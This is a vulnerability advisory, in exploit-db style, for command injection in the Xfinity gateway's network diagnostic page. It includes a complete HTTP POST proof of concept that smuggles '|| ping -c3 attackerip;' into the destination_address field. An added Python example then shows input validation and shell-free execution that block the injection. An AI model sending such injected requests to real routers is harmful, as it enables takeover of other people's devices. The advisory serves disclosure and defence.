
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php

The page at /network_diagnostic_tools.php has a "test connectivity" feature, which is carried out through a POST request to /actionHandler/ajax_network_diagnostic_tools.php. The destination_address parameter of that request is vulnerable to command injection.

PoC:

POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4

If you open Wireshark and set the filter ip.dst==attackerip and icmp, you will see that the router issues 3 ICMP echo requests, proving successful command injection. This can be leveraged to completely compromise the device.

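The root cause described above is a user-controlled value reaching a shell. The following is an added example, not the vendor's code and not a claim about how ajax_network_diagnostic_tools.php is actually written; it is in Python rather than the device's PHP so it can be run stand-alone. It shows the two controls that close this class of bug for a ping-style diagnostic: validating destination_address against a strict hostname/IP grammar (so shell metacharacters such as `||` and `;` can never pass) and building the ping command as an argument vector rather than a shell string. The function names, the count limit and the sample inputs are assumptions made for the example.

```python
"""Hardened handling of a user-supplied ping target.

Added example for this advisory (not Xfinity's or the vendor's code).
Two independent controls are demonstrated:
  1. destination_address is accepted only if it is a hostname or an IP
     literal, so '|', ';', '&', spaces and other shell syntax are rejected.
  2. The command is built as an argv list and would be run with shell=False,
     so no shell ever parses the user's value even if validation had a gap.
"""
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each 1-63 chars with no leading or trailing hyphen, at most 253 chars total.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_destination(value: str) -> bool:
    """Accept only a hostname or an IPv4/IPv6 literal; reject everything else."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # "10.0.0.1", "2001:db8::1", ...
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(value) is not None


def is_valid_count(value: str, maximum: int = 10) -> bool:
    """count1 must be a small positive integer, never free-form text.

    The cap of 10 is an assumed policy value for this example."""
    return value.isdigit() and 1 <= int(value) <= maximum


def build_ping_argv(destination: str, count: str) -> Optional[List[str]]:
    """Return the argv list for ping, or None if either parameter is rejected.

    Because the result is a list, the destination is exactly one argument to
    ping: a value like 'host || id' would be handed to ping literally rather
    than being executed, and here it is rejected before that point anyway.
    Leading-hyphen values are excluded by the grammar, so the destination
    cannot be mistaken for a ping option either.
    """
    if not is_valid_destination(destination) or not is_valid_count(count):
        return None
    return ["ping", "-c", str(int(count)), destination]


def run_ping(destination: str, count: str, timeout: float = 30.0) -> Optional[str]:
    """Run the validated command without a shell and return its output."""
    argv = build_ping_argv(destination, count)
    if argv is None:
        return None
    completed = subprocess.run(  # shell=False is the default and is essential
        argv, capture_output=True, text=True, timeout=timeout, check=False
    )
    return completed.stdout


if __name__ == "__main__":
    # Constructed inputs: what the legitimate UI sends, an IP literal, and a
    # value with the shape of the injected parameter from the advisory above.
    for dest in ("www.comcast.net", "10.0.0.1",
                 "www.comcast.net || ping -c3 attackerip;"):
        print(repr(dest), "->", build_ping_argv(dest, "4"))
```

Either control alone would have stopped the PoC above; using both means a validation bypass still does not reach a shell, and a logging hook at the rejection point gives defenders a clean signal for attempted injection against the diagnostic endpoint.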
This vulnerability is also particularly dangerous because there are no CSRF protections in this application, as demonstrated at https://www.exploit-db.com/exploits/40853/